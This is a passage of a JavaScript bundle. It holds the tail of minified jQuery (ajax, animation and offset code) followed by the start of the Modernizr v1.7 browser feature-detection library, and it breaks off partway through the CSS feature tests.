function(){try{return new z.ActiveXObject("Microsoft.XMLHTTP")}catch(a){}},accepts:{xml:"application/xml, text/xml",html:"text/html",script:"text/javascript, application/javascript",json:"application/json, text/javascript",text:"text/plain",_default:"*/*"}},lastModified:{},etag:{},ajax:function(a){function b(){e.success&&e.success.call(o,n,j,w);e.global&&f("ajaxSuccess",[w,e])}function d(){e.complete&&e.complete.call(o,w,j);e.global&&f("ajaxComplete",[w,e]);e.global&&!--c.active&&c.event.trigger("ajaxStop")}
function f(q,p){(e.context?c(e.context):c.event).trigger(q,p)}var e=c.extend(true,{},c.ajaxSettings,a),i,j,n,o=a&&a.context||e,m=e.type.toUpperCase();if(e.data&&e.processData&&typeof e.data!=="string")e.data=c.param(e.data,e.traditional);if(e.dataType==="jsonp"){if(m==="GET")N.test(e.url)||(e.url+=(ja.test(e.url)?"&":"?")+(e.jsonp||"callback")+"=?");else if(!e.data||!N.test(e.data))e.data=(e.data?e.data+"&":"")+(e.jsonp||"callback")+"=?";e.dataType="json"}if(e.dataType==="json"&&(e.data&&N.test(e.data)||
N.test(e.url))){i=e.jsonpCallback||"jsonp"+pb++;if(e.data)e.data=(e.data+"").replace(N,"="+i+"$1");e.url=e.url.replace(N,"="+i+"$1");e.dataType="script";z[i]=z[i]||function(q){n=q;b();d();z[i]=v;try{delete z[i]}catch(p){}A&&A.removeChild(B)}}if(e.dataType==="script"&&e.cache===null)e.cache=false;if(e.cache===false&&m==="GET"){var s=J(),x=e.url.replace(tb,"$1_="+s+"$2");e.url=x+(x===e.url?(ja.test(e.url)?"&":"?")+"_="+s:"")}if(e.data&&m==="GET")e.url+=(ja.test(e.url)?"&":"?")+e.data;e.global&&!c.active++&&
c.event.trigger("ajaxStart");s=(s=ub.exec(e.url))&&(s[1]&&s[1]!==location.protocol||s[2]!==location.host);if(e.dataType==="script"&&m==="GET"&&s){var A=r.getElementsByTagName("head")[0]||r.documentElement,B=r.createElement("script");B.src=e.url;if(e.scriptCharset)B.charset=e.scriptCharset;if(!i){var C=false;B.onload=B.onreadystatechange=function(){if(!C&&(!this.readyState||this.readyState==="loaded"||this.readyState==="complete")){C=true;b();d();B.onload=B.onreadystatechange=null;A&&B.parentNode&&
A.removeChild(B)}}}A.insertBefore(B,A.firstChild);return v}var E=false,w=e.xhr();if(w){e.username?w.open(m,e.url,e.async,e.username,e.password):w.open(m,e.url,e.async);try{if(e.data||a&&a.contentType)w.setRequestHeader("Content-Type",e.contentType);if(e.ifModified){c.lastModified[e.url]&&w.setRequestHeader("If-Modified-Since",c.lastModified[e.url]);c.etag[e.url]&&w.setRequestHeader("If-None-Match",c.etag[e.url])}s||w.setRequestHeader("X-Requested-With","XMLHttpRequest");w.setRequestHeader("Accept",
e.dataType&&e.accepts[e.dataType]?e.accepts[e.dataType]+", */*":e.accepts._default)}catch(fa){}if(e.beforeSend&&e.beforeSend.call(o,w,e)===false){e.global&&!--c.active&&c.event.trigger("ajaxStop");w.abort();return false}e.global&&f("ajaxSend",[w,e]);var g=w.onreadystatechange=function(q){if(!w||w.readyState===0||q==="abort"){E||d();E=true;if(w)w.onreadystatechange=c.noop}else if(!E&&w&&(w.readyState===4||q==="timeout")){E=true;w.onreadystatechange=c.noop;j=q==="timeout"?"timeout":!c.httpSuccess(w)?
"error":e.ifModified&&c.httpNotModified(w,e.url)?"notmodified":"success";var p;if(j==="success")try{n=c.httpData(w,e.dataType,e)}catch(u){j="parsererror";p=u}if(j==="success"||j==="notmodified")i||b();else c.handleError(e,w,j,p);d();q==="timeout"&&w.abort();if(e.async)w=null}};try{var h=w.abort;w.abort=function(){w&&h.call(w);g("abort")}}catch(k){}e.async&&e.timeout>0&&setTimeout(function(){w&&!E&&g("timeout")},e.timeout);try{w.send(m==="POST"||m==="PUT"||m==="DELETE"?e.data:null)}catch(l){c.handleError(e,
w,null,l);d()}e.async||g();return w}},handleError:function(a,b,d,f){if(a.error)a.error.call(a.context||a,b,d,f);if(a.global)(a.context?c(a.context):c.event).trigger("ajaxError",[b,a,f])},active:0,httpSuccess:function(a){try{return!a.status&&location.protocol==="file:"||a.status>=200&&a.status<300||a.status===304||a.status===1223||a.status===0}catch(b){}return false},httpNotModified:function(a,b){var d=a.getResponseHeader("Last-Modified"),f=a.getResponseHeader("Etag");if(d)c.lastModified[b]=d;if(f)c.etag[b]=
f;return a.status===304||a.status===0},httpData:function(a,b,d){var f=a.getResponseHeader("content-type")||"",e=b==="xml"||!b&&f.indexOf("xml")>=0;a=e?a.responseXML:a.responseText;e&&a.documentElement.nodeName==="parsererror"&&c.error("parsererror");if(d&&d.dataFilter)a=d.dataFilter(a,b);if(typeof a==="string")if(b==="json"||!b&&f.indexOf("json")>=0)a=c.parseJSON(a);else if(b==="script"||!b&&f.indexOf("javascript")>=0)c.globalEval(a);return a},param:function(a,b){function d(j,n){if(c.isArray(n))c.each(n,
function(o,m){b?f(j,m):d(j+"["+(typeof m==="object"||c.isArray(m)?o:"")+"]",m)});else!b&&n!=null&&typeof n==="object"?c.each(n,function(o,m){d(j+"["+o+"]",m)}):f(j,n)}function f(j,n){n=c.isFunction(n)?n():n;e[e.length]=encodeURIComponent(j)+"="+encodeURIComponent(n)}var e=[];if(b===v)b=c.ajaxSettings.traditional;if(c.isArray(a)||a.jquery)c.each(a,function(){f(this.name,this.value)});else for(var i in a)d(i,a[i]);return e.join("&").replace(vb,"+")}});var ka={},wb=/toggle|show|hide/,xb=/^([+-]=)?([\d+-.]+)(.*)$/,
W,ta=[["height","marginTop","marginBottom","paddingTop","paddingBottom"],["width","marginLeft","marginRight","paddingLeft","paddingRight"],["opacity"]];c.fn.extend({show:function(a,b){if(a||a===0)return this.animate(K("show",3),a,b);else{a=0;for(b=this.length;a<b;a++){var d=c.data(this[a],"olddisplay");this[a].style.display=d||"";if(c.css(this[a],"display")==="none"){d=this[a].nodeName;var f;if(ka[d])f=ka[d];else{var e=c("<"+d+" />").appendTo("body");f=e.css("display");if(f==="none")f="block";e.remove();
ka[d]=f}c.data(this[a],"olddisplay",f)}}a=0;for(b=this.length;a<b;a++)this[a].style.display=c.data(this[a],"olddisplay")||"";return this}},hide:function(a,b){if(a||a===0)return this.animate(K("hide",3),a,b);else{a=0;for(b=this.length;a<b;a++){var d=c.data(this[a],"olddisplay");!d&&d!=="none"&&c.data(this[a],"olddisplay",c.css(this[a],"display"))}a=0;for(b=this.length;a<b;a++)this[a].style.display="none";return this}},_toggle:c.fn.toggle,toggle:function(a,b){var d=typeof a==="boolean";if(c.isFunction(a)&&
c.isFunction(b))this._toggle.apply(this,arguments);else a==null||d?this.each(function(){var f=d?a:c(this).is(":hidden");c(this)[f?"show":"hide"]()}):this.animate(K("toggle",3),a,b);return this},fadeTo:function(a,b,d){return this.filter(":hidden").css("opacity",0).show().end().animate({opacity:b},a,d)},animate:function(a,b,d,f){var e=c.speed(b,d,f);if(c.isEmptyObject(a))return this.each(e.complete);return this[e.queue===false?"each":"queue"](function(){var i=c.extend({},e),j,n=this.nodeType===1&&c(this).is(":hidden"),
o=this;for(j in a){var m=j.replace(ha,ia);if(j!==m){a[m]=a[j];delete a[j];j=m}if(a[j]==="hide"&&n||a[j]==="show"&&!n)return i.complete.call(this);if((j==="height"||j==="width")&&this.style){i.display=c.css(this,"display");i.overflow=this.style.overflow}if(c.isArray(a[j])){(i.specialEasing=i.specialEasing||{})[j]=a[j][1];a[j]=a[j][0]}}if(i.overflow!=null)this.style.overflow="hidden";i.curAnim=c.extend({},a);c.each(a,function(s,x){var A=new c.fx(o,i,s);if(wb.test(x))A[x==="toggle"?n?"show":"hide":x](a);
else{var B=xb.exec(x),C=A.cur(true)||0;if(B){x=parseFloat(B[2]);var E=B[3]||"px";if(E!=="px"){o.style[s]=(x||1)+E;C=(x||1)/A.cur(true)*C;o.style[s]=C+E}if(B[1])x=(B[1]==="-="?-1:1)*x+C;A.custom(C,x,E)}else A.custom(C,x,"")}});return true})},stop:function(a,b){var d=c.timers;a&&this.queue([]);this.each(function(){for(var f=d.length-1;f>=0;f--)if(d[f].elem===this){b&&d[f](true);d.splice(f,1)}});b||this.dequeue();return this}});c.each({slideDown:K("show",1),slideUp:K("hide",1),slideToggle:K("toggle",
1),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"}},function(a,b){c.fn[a]=function(d,f){return this.animate(b,d,f)}});c.extend({speed:function(a,b,d){var f=a&&typeof a==="object"?a:{complete:d||!d&&b||c.isFunction(a)&&a,duration:a,easing:d&&b||b&&!c.isFunction(b)&&b};f.duration=c.fx.off?0:typeof f.duration==="number"?f.duration:c.fx.speeds[f.duration]||c.fx.speeds._default;f.old=f.complete;f.complete=function(){f.queue!==false&&c(this).dequeue();c.isFunction(f.old)&&f.old.call(this)};return f},easing:{linear:function(a,
b,d,f){return d+f*a},swing:function(a,b,d,f){return(-Math.cos(a*Math.PI)/2+0.5)*f+d}},timers:[],fx:function(a,b,d){this.options=b;this.elem=a;this.prop=d;if(!b.orig)b.orig={}}});c.fx.prototype={update:function(){this.options.step&&this.options.step.call(this.elem,this.now,this);(c.fx.step[this.prop]||c.fx.step._default)(this);if((this.prop==="height"||this.prop==="width")&&this.elem.style)this.elem.style.display="block"},cur:function(a){if(this.elem[this.prop]!=null&&(!this.elem.style||this.elem.style[this.prop]==
null))return this.elem[this.prop];return(a=parseFloat(c.css(this.elem,this.prop,a)))&&a>-10000?a:parseFloat(c.curCSS(this.elem,this.prop))||0},custom:function(a,b,d){function f(i){return e.step(i)}this.startTime=J();this.start=a;this.end=b;this.unit=d||this.unit||"px";this.now=this.start;this.pos=this.state=0;var e=this;f.elem=this.elem;if(f()&&c.timers.push(f)&&!W)W=setInterval(c.fx.tick,13)},show:function(){this.options.orig[this.prop]=c.style(this.elem,this.prop);this.options.show=true;this.custom(this.prop===
"width"||this.prop==="height"?1:0,this.cur());c(this.elem).show()},hide:function(){this.options.orig[this.prop]=c.style(this.elem,this.prop);this.options.hide=true;this.custom(this.cur(),0)},step:function(a){var b=J(),d=true;if(a||b>=this.options.duration+this.startTime){this.now=this.end;this.pos=this.state=1;this.update();this.options.curAnim[this.prop]=true;for(var f in this.options.curAnim)if(this.options.curAnim[f]!==true)d=false;if(d){if(this.options.display!=null){this.elem.style.overflow=
this.options.overflow;a=c.data(this.elem,"olddisplay");this.elem.style.display=a?a:this.options.display;if(c.css(this.elem,"display")==="none")this.elem.style.display="block"}this.options.hide&&c(this.elem).hide();if(this.options.hide||this.options.show)for(var e in this.options.curAnim)c.style(this.elem,e,this.options.orig[e]);this.options.complete.call(this.elem)}return false}else{e=b-this.startTime;this.state=e/this.options.duration;a=this.options.easing||(c.easing.swing?"swing":"linear");this.pos=
c.easing[this.options.specialEasing&&this.options.specialEasing[this.prop]||a](this.state,e,0,1,this.options.duration);this.now=this.start+(this.end-this.start)*this.pos;this.update()}return true}};c.extend(c.fx,{tick:function(){for(var a=c.timers,b=0;b<a.length;b++)a[b]()||a.splice(b--,1);a.length||c.fx.stop()},stop:function(){clearInterval(W);W=null},speeds:{slow:600,fast:200,_default:400},step:{opacity:function(a){c.style(a.elem,"opacity",a.now)},_default:function(a){if(a.elem.style&&a.elem.style[a.prop]!=
null)a.elem.style[a.prop]=(a.prop==="width"||a.prop==="height"?Math.max(0,a.now):a.now)+a.unit;else a.elem[a.prop]=a.now}}});if(c.expr&&c.expr.filters)c.expr.filters.animated=function(a){return c.grep(c.timers,function(b){return a===b.elem}).length};c.fn.offset="getBoundingClientRect"in r.documentElement?function(a){var b=this[0];if(a)return this.each(function(e){c.offset.setOffset(this,a,e)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return c.offset.bodyOffset(b);var d=b.getBoundingClientRect(),
f=b.ownerDocument;b=f.body;f=f.documentElement;return{top:d.top+(self.pageYOffset||c.support.boxModel&&f.scrollTop||b.scrollTop)-(f.clientTop||b.clientTop||0),left:d.left+(self.pageXOffset||c.support.boxModel&&f.scrollLeft||b.scrollLeft)-(f.clientLeft||b.clientLeft||0)}}:function(a){var b=this[0];if(a)return this.each(function(s){c.offset.setOffset(this,a,s)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return c.offset.bodyOffset(b);c.offset.initialize();var d=b.offsetParent,f=
b,e=b.ownerDocument,i,j=e.documentElement,n=e.body;f=(e=e.defaultView)?e.getComputedStyle(b,null):b.currentStyle;for(var o=b.offsetTop,m=b.offsetLeft;(b=b.parentNode)&&b!==n&&b!==j;){if(c.offset.supportsFixedPosition&&f.position==="fixed")break;i=e?e.getComputedStyle(b,null):b.currentStyle;o-=b.scrollTop;m-=b.scrollLeft;if(b===d){o+=b.offsetTop;m+=b.offsetLeft;if(c.offset.doesNotAddBorder&&!(c.offset.doesAddBorderForTableAndCells&&/^t(able|d|h)$/i.test(b.nodeName))){o+=parseFloat(i.borderTopWidth)||
0;m+=parseFloat(i.borderLeftWidth)||0}f=d;d=b.offsetParent}if(c.offset.subtractsBorderForOverflowNotVisible&&i.overflow!=="visible"){o+=parseFloat(i.borderTopWidth)||0;m+=parseFloat(i.borderLeftWidth)||0}f=i}if(f.position==="relative"||f.position==="static"){o+=n.offsetTop;m+=n.offsetLeft}if(c.offset.supportsFixedPosition&&f.position==="fixed"){o+=Math.max(j.scrollTop,n.scrollTop);m+=Math.max(j.scrollLeft,n.scrollLeft)}return{top:o,left:m}};c.offset={initialize:function(){var a=r.body,b=r.createElement("div"),
d,f,e,i=parseFloat(c.curCSS(a,"marginTop",true))||0;c.extend(b.style,{position:"absolute",top:0,left:0,margin:0,border:0,width:"1px",height:"1px",visibility:"hidden"});b.innerHTML="<div style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;'><div></div></div><table style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;' cellpadding='0' cellspacing='0'><tr><td></td></tr></table>";a.insertBefore(b,a.firstChild);
d=b.firstChild;f=d.firstChild;e=d.nextSibling.firstChild.firstChild;this.doesNotAddBorder=f.offsetTop!==5;this.doesAddBorderForTableAndCells=e.offsetTop===5;f.style.position="fixed";f.style.top="20px";this.supportsFixedPosition=f.offsetTop===20||f.offsetTop===15;f.style.position=f.style.top="";d.style.overflow="hidden";d.style.position="relative";this.subtractsBorderForOverflowNotVisible=f.offsetTop===-5;this.doesNotIncludeMarginInBodyOffset=a.offsetTop!==i;a.removeChild(b);c.offset.initialize=c.noop},
bodyOffset:function(a){var b=a.offsetTop,d=a.offsetLeft;c.offset.initialize();if(c.offset.doesNotIncludeMarginInBodyOffset){b+=parseFloat(c.curCSS(a,"marginTop",true))||0;d+=parseFloat(c.curCSS(a,"marginLeft",true))||0}return{top:b,left:d}},setOffset:function(a,b,d){if(/static/.test(c.curCSS(a,"position")))a.style.position="relative";var f=c(a),e=f.offset(),i=parseInt(c.curCSS(a,"top",true),10)||0,j=parseInt(c.curCSS(a,"left",true),10)||0;if(c.isFunction(b))b=b.call(a,d,e);d={top:b.top-e.top+i,left:b.left-
e.left+j};"using"in b?b.using.call(a,d):f.css(d)}};c.fn.extend({position:function(){if(!this[0])return null;var a=this[0],b=this.offsetParent(),d=this.offset(),f=/^body|html$/i.test(b[0].nodeName)?{top:0,left:0}:b.offset();d.top-=parseFloat(c.curCSS(a,"marginTop",true))||0;d.left-=parseFloat(c.curCSS(a,"marginLeft",true))||0;f.top+=parseFloat(c.curCSS(b[0],"borderTopWidth",true))||0;f.left+=parseFloat(c.curCSS(b[0],"borderLeftWidth",true))||0;return{top:d.top-f.top,left:d.left-f.left}},offsetParent:function(){return this.map(function(){for(var a=
this.offsetParent||r.body;a&&!/^body|html$/i.test(a.nodeName)&&c.css(a,"position")==="static";)a=a.offsetParent;return a})}});c.each(["Left","Top"],function(a,b){var d="scroll"+b;c.fn[d]=function(f){var e=this[0],i;if(!e)return null;if(f!==v)return this.each(function(){if(i=ua(this))i.scrollTo(!a?f:c(i).scrollLeft(),a?f:c(i).scrollTop());else this[d]=f});else return(i=ua(e))?"pageXOffset"in i?i[a?"pageYOffset":"pageXOffset"]:c.support.boxModel&&i.document.documentElement[d]||i.document.body[d]:e[d]}});
c.each(["Height","Width"],function(a,b){var d=b.toLowerCase();c.fn["inner"+b]=function(){return this[0]?c.css(this[0],d,false,"padding"):null};c.fn["outer"+b]=function(f){return this[0]?c.css(this[0],d,false,f?"margin":"border"):null};c.fn[d]=function(f){var e=this[0];if(!e)return f==null?null:this;if(c.isFunction(f))return this.each(function(i){var j=c(this);j[d](f.call(this,i,j[d]()))});return"scrollTo"in e&&e.document?e.document.compatMode==="CSS1Compat"&&e.document.documentElement["client"+b]||
e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===v?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});z.jQuery=z.$=c})(window);


/*!
 * Modernizr v1.7
 * http://www.modernizr.com
 *
 * Developed by: 
 * - Faruk Ates  http://farukat.es/
 * - Paul Irish  http://paulirish.com/
 *
 * Copyright (c) 2009-2011
 * Dual-licensed under the BSD or MIT licenses.
 * http://www.modernizr.com/license/
 */

 
/*
 * Modernizr is a script that detects native CSS3 and HTML5 features
 * available in the current UA and provides an object containing all
 * features with a true/false value, depending on whether the UA has
 * native support for it or not.
 * 
 * Modernizr will also add classes to the <html> element of the page,
 * one for each feature it detects. If the UA supports it, a class
 * like "cssgradients" will be added. If not, the class name will be
 * "no-cssgradients". This allows for simple if-conditionals in your
 * CSS, giving you fine control over the look & feel of your website.
 * 
 * @author        Faruk Ates
 * @author        Paul Irish
 * @copyright     (c) 2009-2011 Faruk Ates.
 * @contributor   Ben Alman
 */

window.Modernizr = (function(window,document,undefined){
    
    var version = '1.7',

    ret = {},

    /**
     * !! DEPRECATED !!
     * 
     * enableHTML5 is a private property for advanced use only. If enabled,
     * it will make Modernizr.init() run through a brief while() loop in
     * which it will create all HTML5 elements in the DOM to allow for
     * styling them in Internet Explorer, which does not recognize any
     * non-HTML4 elements unless created in the DOM this way.
     * 
     * enableHTML5 is ON by default.
     * 
     * The enableHTML5 toggle option is DEPRECATED as per 1.6, and will be
     * replaced in 2.0 in lieu of the modular, configurable nature of 2.0.
     */
    enableHTML5 = true,
    
    
    docElement = document.documentElement,
    docHead = document.head || document.getElementsByTagName('head')[0],

    /**
     * Create our "modernizr" element that we do most feature tests on.
     */
    mod = 'modernizr',
    modElem = document.createElement( mod ),
    m_style = modElem.style,

    /**
     * Create the input element for various Web Forms feature tests.
     */
    inputElem = document.createElement( 'input' ),
    
    smile = ':)',
    
    tostring = Object.prototype.toString,
    
    // List of property values to set for css tests. See ticket #21
    prefixes = ' -webkit- -moz- -o- -ms- -khtml- '.split(' '),

    // Following spec is to expose vendor-specific style properties as:
    //   elem.style.WebkitBorderRadius
    // and the following would be incorrect:
    //   elem.style.webkitBorderRadius
    
    // Webkit ghosts their properties in lowercase but Opera & Moz do not.
    // Microsoft foregoes prefixes entirely <= IE8, but appears to 
    //   use a lowercase `ms` instead of the correct `Ms` in IE9
    
    // More here: http://github.com/Modernizr/Modernizr/issues/issue/21
    domPrefixes = 'Webkit Moz O ms Khtml'.split(' '),

    ns = {'svg': 'http://www.w3.org/2000/svg'},

    tests = {},
    inputs = {},
    attrs = {},
    
    classes = [],
    
    featurename, // used in testing loop
    
    
    
    // todo: consider using http://javascript.nwbox.com/CSSSupport/css-support.js instead
    testMediaQuery = function(mq){

      var st = document.createElement('style'),
          div = document.createElement('div'),
          ret;

      st.textContent = mq + '{#modernizr{height:3px}}';
      docHead.appendChild(st);
      div.id = 'modernizr';
      docElement.appendChild(div);

      ret = div.offsetHeight === 3;

      st.parentNode.removeChild(st);
      div.parentNode.removeChild(div);

      return !!ret;

    },
    
    
    /**
      * isEventSupported determines if a given element supports the given event
      * function from http://yura.thinkweb2.com/isEventSupported/
      */
    isEventSupported = (function(){

      var TAGNAMES = {
        'select':'input','change':'input',
        'submit':'form','reset':'form',
        'error':'img','load':'img','abort':'img'
      };

      function isEventSupported(eventName, element) {

        element = element || document.createElement(TAGNAMES[eventName] || 'div');
        eventName = 'on' + eventName;

        // When using `setAttribute`, IE skips "unload", WebKit skips "unload" and "resize", whereas `in` "catches" those
        var isSupported = (eventName in element);

        if (!isSupported) {
          // If it has no `setAttribute` (i.e. doesn't implement Node interface), try generic element
          if (!element.setAttribute) {
            element = document.createElement('div');
          }
          if (element.setAttribute && element.removeAttribute) {
            element.setAttribute(eventName, '');
            isSupported = is(element[eventName], 'function');

            // If property was created, "remove it" (by setting value to `undefined`)
            if (!is(element[eventName], undefined)) {
              element[eventName] = undefined;
            }
            element.removeAttribute(eventName);
          }
        }

        element = null;
        return isSupported;
      }
      return isEventSupported;
    })();
    
    
    // hasOwnProperty shim by kangax needed for Safari 2.0 support
    var _hasOwnProperty = ({}).hasOwnProperty, hasOwnProperty;
    if (!is(_hasOwnProperty, undefined) && !is(_hasOwnProperty.call, undefined)) {
      hasOwnProperty = function (object, property) {
        return _hasOwnProperty.call(object, property);
      };
    }
    else {
      hasOwnProperty = function (object, property) { /* yes, this can give false positives/negatives, but most of the time we don't care about those */
        return ((property in object) && is(object.constructor.prototype[property], undefined));
      };
    }
    
    /**
     * set_css applies given styles to the Modernizr DOM node.
     */
    function set_css( str ) {
        m_style.cssText = str;
    }

    /**
     * set_css_all extrapolates all vendor-specific css strings.
     */
    function set_css_all( str1, str2 ) {
        return set_css(prefixes.join(str1 + ';') + ( str2 || '' ));
    }

    /**
     * is returns a boolean for if typeof obj is exactly type.
     */
    function is( obj, type ) {
        return typeof obj === type;
    }

    /**
     * contains returns a boolean for if substr is found within str.
     */
    function contains( str, substr ) {
        return (''+str).indexOf( substr ) !== -1;
    }

    /**
     * test_props is a generic CSS / DOM property test; if a browser supports
     *   a certain property, it won't return undefined for it.
     *   A supported CSS property returns empty string when its not yet set.
     */
    function test_props( props, callback ) {
        for ( var i in props ) {
            if ( m_style[ props[i] ] !== undefined && ( !callback || callback( props[i], modElem ) ) ) {
                return true;
            }
        }
    }

    /**
     * test_props_all tests a list of DOM properties we want to check against.
     *   We specify literally ALL possible (known and/or likely) properties on 
     *   the element including the non-vendor prefixed one, for forward-
     *   compatibility.
     */
    function test_props_all( prop, callback ) {
      
        var uc_prop = prop.charAt(0).toUpperCase() + prop.substr(1),
            props   = (prop + ' ' + domPrefixes.join(uc_prop + ' ') + uc_prop).split(' ');

        return !!test_props( props, callback );
    }
    

    /**
     * Tests
     * -----
     */

    tests['flexbox'] = function() {
        /**
         * set_prefixed_value_css sets the property of a specified element
         * adding vendor prefixes to the VALUE of the property.
         * @param {Element} element
         * @param {string} property The property name. This will not be prefixed.
         * @param {string} value The value of the property. This WILL be prefixed.
         * @param {string=} extra Additional CSS to append unmodified to the end of
         * the CSS string.
         */
        function set_prefixed_value_css(element, property, value, extra) {
            property += ':';
            element.style.cssText = (property + prefixes.join(value + ';' + property)).slice(0, -property.length) + (extra || '');
        }

        /**
         * set_prefixed_property_css sets the property of a specified element
         * adding vendor prefixes to the NAME of the property.
         * @param {Element} element
         * @param {string} property The property name. This WILL be prefixed.
         * @param {string} value The value of the property. This will not be prefixed.
         * @param {string=} extra Additional CSS to append unmodified to the end of
         * the CSS string.
         */
        function set_prefixed_property_css(element, property, value, extra) {
            element.style.cssText = prefixes.join(property + ':' + value + ';') + (extra || '');
        }

        var c = document.createElement('div'),
            elem = document.createElement('div');

        set_prefixed_value_css(c, 'display', 'box', 'width:42px;padding:0;');
        set_prefixed_property_css(elem, 'box-flex', '1', 'width:10px;');

        c.appendChild(elem);
        docElement.appendChild(c);

        var ret = elem.offsetWidth === 42;

        c.removeChild(elem);
        docElement.removeChild(c);

        return ret;
    };
    
    // On the S60 and BB Storm, getContext exists, but always returns undefined
    // http://github.com/Modernizr/Modernizr/issues/issue/97/ 
    
    tests['canvas'] = function() {
        var elem = document.createElement( 'canvas' );
        return !!(elem.getContext && elem.getContext('2d'));
    };
    
    tests['canvastext'] = function() {
        return !!(ret['canvas'] && is(document.createElement( 'canvas' ).getContext('2d').fillText, 'function'));
    };
    
    // This WebGL test false positives in FF depending on graphics hardware. But really it's quite impossible to know
    // wether webgl will succeed until after you create the context. You might have hardware that can support
    // a 100x100 webgl canvas, but will not support a 1000x1000 webgl canvas. So this feature inference is weak, 
    // but intentionally so.
    tests['webgl'] = function(){
        return !!window.WebGLRenderingContext;
    };
    
    /*
     * The Modernizr.touch test only indicates if the browser supports
     *    touch events, which does not necessarily reflect a touchscreen
     *    device, as evidenced by tablets running Windows 7 or, alas,
     *    the Palm Pre / WebOS (touch) phones.
     *    
     * Additionally, Chrome (desktop) used to lie about its support on this,
     *    but that has since been rectified: http://crbug.com/36415
     *    
     * We also test for Firefox 4 Multitouch Support.
     *
     * For more info, see: http://modernizr.github.com/Modernizr/touch.html
     */
     
    tests['touch'] = function() {

        return ('ontouchstart' in window) || testMediaQuery('@media ('+prefixes.join('touch-enabled),(')+'modernizr)');

    };


    /**
     * geolocation tests for the new Geolocation API specification.
     *   This test is a standards compliant-only test; for more complete
     *   testing, including a Google Gears fallback, please see:
     *   http://code.google.com/p/geo-location-javascript/
     * or view a fallback solution using google's geo API:
     *   http://gist.github.com/366184
     */
    tests['geolocation'] = function() {
        return !!navigator.geolocation;
    };

    // Per 1.6: 
    // This used to be Modernizr.crosswindowmessaging but the longer
    // name has been deprecated in favor of a shorter and property-matching one.
    // The old API is still available in 1.6, but as of 2.0 will throw a warning,
    // and in the first release thereafter disappear entirely.
    tests['postmessage'] = function() {
      return !!window.postMessage;
    };

    // Web SQL database detection is tricky:

    // In chrome incognito mode, openDatabase is truthy, but using it will 
    //   throw an exception: http://crbug.com/42380
    // We can create a dummy database, but there is no way to delete it afterwards. 
    
    // Meanwhile, Safari users can get prompted on any database creation.
    //   If they do, any page with Modernizr will give them a prompt:
    //   http://github.com/Modernizr/Modernizr/issues/closed#issue/113
    
    // We have chosen to allow the Chrome incognito false positive, so that Modernizr
    //   doesn't litter the web with these test databases. As a developer, you'll have
    //   to account for this gotcha yourself.
    tests['websqldatabase'] = function() {
      var result = !!window.openDatabase;
      /*  if (result){
            try {
              result = !!openDatabase( mod + "testdb", "1.0", mod + "testdb", 2e4);
            } catch(e) {
            }
          }  */
      return result;
    };
    
    // Vendors have inconsistent prefixing with the experimental Indexed DB:
    // - Firefox is shipping indexedDB in FF4 as moz_indexedDB
    // - Webkit's implementation is accessible through webkitIndexedDB
    // We test both styles.
    tests['indexedDB'] = function(){
      for (var i = -1, len = domPrefixes.length; ++i < len; ){ 
        var prefix = domPrefixes[i].toLowerCase();
        if (window[prefix + '_indexedDB'] || window[prefix + 'IndexedDB']){
          return true;
        } 
      }
      return false;
    };

    // documentMode logic from YUI to filter out IE8 Compat Mode
    //   which false positives.
    tests['hashchange'] = function() {
      return isEventSupported('hashchange', window) && ( document.documentMode === undefined || document.documentMode > 7 );
    };

    // Per 1.6: 
    // This used to be Modernizr.historymanagement but the longer
    // name has been deprecated in favor of a shorter and property-matching one.
    // The old API is still available in 1.6, but as of 2.0 will throw a warning,
    // and in the first release thereafter disappear entirely.
    tests['history'] = function() {
      return !!(window.history && history.pushState);
    };

    tests['draganddrop'] = function() {
        return isEventSupported('dragstart') && isEventSupported('drop');
    };
    
    tests['websockets'] = function(){
        return ('WebSocket' in window);
    };
    
    
    // http://css-tricks.com/rgba-browser-support/
    tests['rgba'] = function() {
        // Set an rgba() color and check the returned value
        
        set_css(  'background-color:rgba(150,255,150,.5)' );
        
        return contains( m_style.backgroundColor, 'rgba' );
    };
    
    tests['hsla'] = function() {
        // Same as rgba(), in fact, browsers re-map hsla() to rgba() internally,
        //   except IE9 who retains it as hsla
        
        set_css('background-color:hsla(120,40%,100%,.5)' );
        
        return contains( m_style.backgroundColor, 'rgba' ) || contains( m_style.backgroundColor, 'hsla' );
    };
    
    tests['multiplebgs'] = function() {
        // Setting multiple images AND a color on the background shorthand property
        //  and then querying the style.background property value for the number of
        //  occurrences of "url(" is a reliable method for detecting ACTUAL support for this!
        
        set_css( 'background:url(//:),url(//:),red url(//:)' );
        
        // If the UA supports multiple backgrounds, there should be three occurrences
        //   of the string "url(" in the return value for elem_style.background

        return new RegExp("(url\\s*\\(.*?){3}").test(m_style.background);
    };
    
    
    // In testing support for a given CSS property, it's legit to test:
    //    `elem.style[styleName] !== undefined`
    // If the property is supported it will return an empty string,
    // if unsupported it will return undefined.
    
    // We'll take advantage of this quick test and skip setting a style 
    // on our modernizr element, but instead just testing undefined vs
    // empty string.
    

    tests['backgroundsize'] = function() {
        return test_props_all( 'backgroundSize' );
    };
    
    tests['borderimage'] = function() {
        return test_props_all( 'borderImage' );
    };
    
    
    // Super comprehensive table about all the unique implementations of 
    // border-radius: http://muddledramblings.com/table-of-css3-border-radius-compliance
    
    tests['borderradius'] = function() {
        return test_props_all( 'borderRadius', '', function( prop ) {
            return contains( prop, 'orderRadius' );
        });
    };
    
    // WebOS unfortunately false positives on this test.
    tests['boxshadow'] = function() {
        return test_props_all( 'boxShadow' );
    };
    
    // FF3.0 will false positive on this test 
    tests['textshadow'] = function(){
        return document.createElement('div').style.textShadow === '';
    };
    
    
    tests['opacity'] = function() {
        // Browsers that actually have CSS Opacity implemented have done so
        //  according to spec, which means their return values are within the
        //  range of [0.0,1.0] - including the leading zero.
        
        set_css_all( 'opacity:.55' );
        
        // The non-literal . in this regex is intentional:
        //   German Chrome returns this value as 0,55
        // https://github.com/Modernizr/Modernizr/issues/#issue/59/comment/516632
        return /^0.55$/.test(m_style.opacity);
    };
    
    
    tests['cssanimations'] = function() {
        return test_props_all( 'animationName' );
    };
    
    
    tests['csscolumns'] = function() {
